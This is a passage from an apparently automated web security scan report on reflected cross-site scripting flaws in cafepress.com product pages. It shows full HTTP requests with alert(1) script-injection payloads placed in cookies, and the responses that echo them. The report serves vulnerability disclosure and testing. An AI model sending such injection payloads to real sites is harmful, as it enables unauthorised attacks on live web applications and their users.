__utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA18c76"-alert(1)-"2689714fbb2; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW22
Cteonnt-Length: 59056
Date: Sun, 26 Dec 2010 13:49:12 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:12 GMT; path=/
Set-Cookie: cp_sc=100175; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:12 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59056

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";


   s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA18c76"-alert(1)-"2689714fbb2";

   s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
   if (s.eVar26 == "")
   {

       if ("" == "affiliate")
       {
           s.eVar26 = "2099"; //2099 = affiliate
       }
       el
...[SNIP]...

1.45. http://www.cafepress.com/+keepsake_boxes [cp_st cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/+keepsake_boxes

Issue detail

The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f272a</script><script>alert(1)</script>d1528753cbe was submitted in the cp_st cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /+keepsake_boxes HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=f272a</script><script>alert(1)</script>d1528753cbe; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW19
Cteonnt-Length: 59083
Date: Sun, 26 Dec 2010 13:49:10 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:10 GMT; path=/
Set-Cookie: cp_sc=100175; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:10 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59083

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
= 'cafepress.com';

window.cafepress.originCountryCode = 'US'

window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = 'SearchResults'
window.cafepress.tealeaf.searchTerm = 'f272a</script><script>alert(1)</script>d1528753cbe'
window.cafepress.tealeaf.salesChannel = 'Marketplace'
window.cafepress.tealeaf.trafficMedium = 'SEO'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C
...[SNIP]...

1.46. http://www.cafepress.com/+license_plate_frames [cp-v cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/+license_plate_frames

Issue detail

The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7fe28"-alert(1)-"4e9cbe178c4 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /+license_plate_frames HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA7fe28"-alert(1)-"4e9cbe178c4; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW27
ntCoent-Length: 59959
Date: Sun, 26 Dec 2010 13:48:49 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:49 GMT; path=/
Set-Cookie: cp_sc=100230; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:49 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59959

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";


   s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA7fe28"-alert(1)-"4e9cbe178c4";

   s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
   if (s.eVar26 == "")
   {

       if ("" == "affiliate")
       {
           s.eVar26 = "2099"; //2099 = affiliate
       }
       el
...[SNIP]...

1.47. http://www.cafepress.com/+license_plate_frames [cp_st cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/+license_plate_frames

Issue detail

The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2df2e</script><script>alert(1)</script>12b946216a2 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /+license_plate_frames HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=2df2e</script><script>alert(1)</script>12b946216a2; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW27
ntCoent-Length: 59978
Date: Sun, 26 Dec 2010 13:48:47 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:47 GMT; path=/
Set-Cookie: cp_sc=100230; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:47 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59978

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
= 'cafepress.com';

window.cafepress.originCountryCode = 'US'

window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = 'SearchResults'
window.cafepress.tealeaf.searchTerm = '2df2e</script><script>alert(1)</script>12b946216a2'
window.cafepress.tealeaf.salesChannel = 'Marketplace'
window.cafepress.tealeaf.trafficMedium = 'SEO'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C
...[SNIP]...

1.48. http://www.cafepress.com/+magnets [cp-v cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/+magnets

Issue detail

The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 48b1e"-alert(1)-"48ef400b324 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /+magnets HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA48b1e"-alert(1)-"48ef400b324; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW19
Cteonnt-Length: 59192
Date: Sun, 26 Dec 2010 13:48:47 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:47 GMT; path=/
Set-Cookie: cp_sc=100214; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:47 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59192

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";


   s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA48b1e"-alert(1)-"48ef400b324";

   s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
   if (s.eVar26 == "")
   {

       if ("" == "affiliate")
       {
           s.eVar26 = "2099"; //2099 = affiliate
       }
       el
...[SNIP]...

1.49. http://www.cafepress.com/+magnets [cp_st cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/+magnets

Issue detail

The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f1a93</script><script>alert(1)</script>a21dc3c1ba6 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /+magnets HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=f1a93</script><script>alert(1)</script>a21dc3c1ba6; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW13
Cteonnt-Length: 59206
Date: Sun, 26 Dec 2010 13:48:45 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:44 GMT; path=/
Set-Cookie: cp_sc=100214; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:44 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59206

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
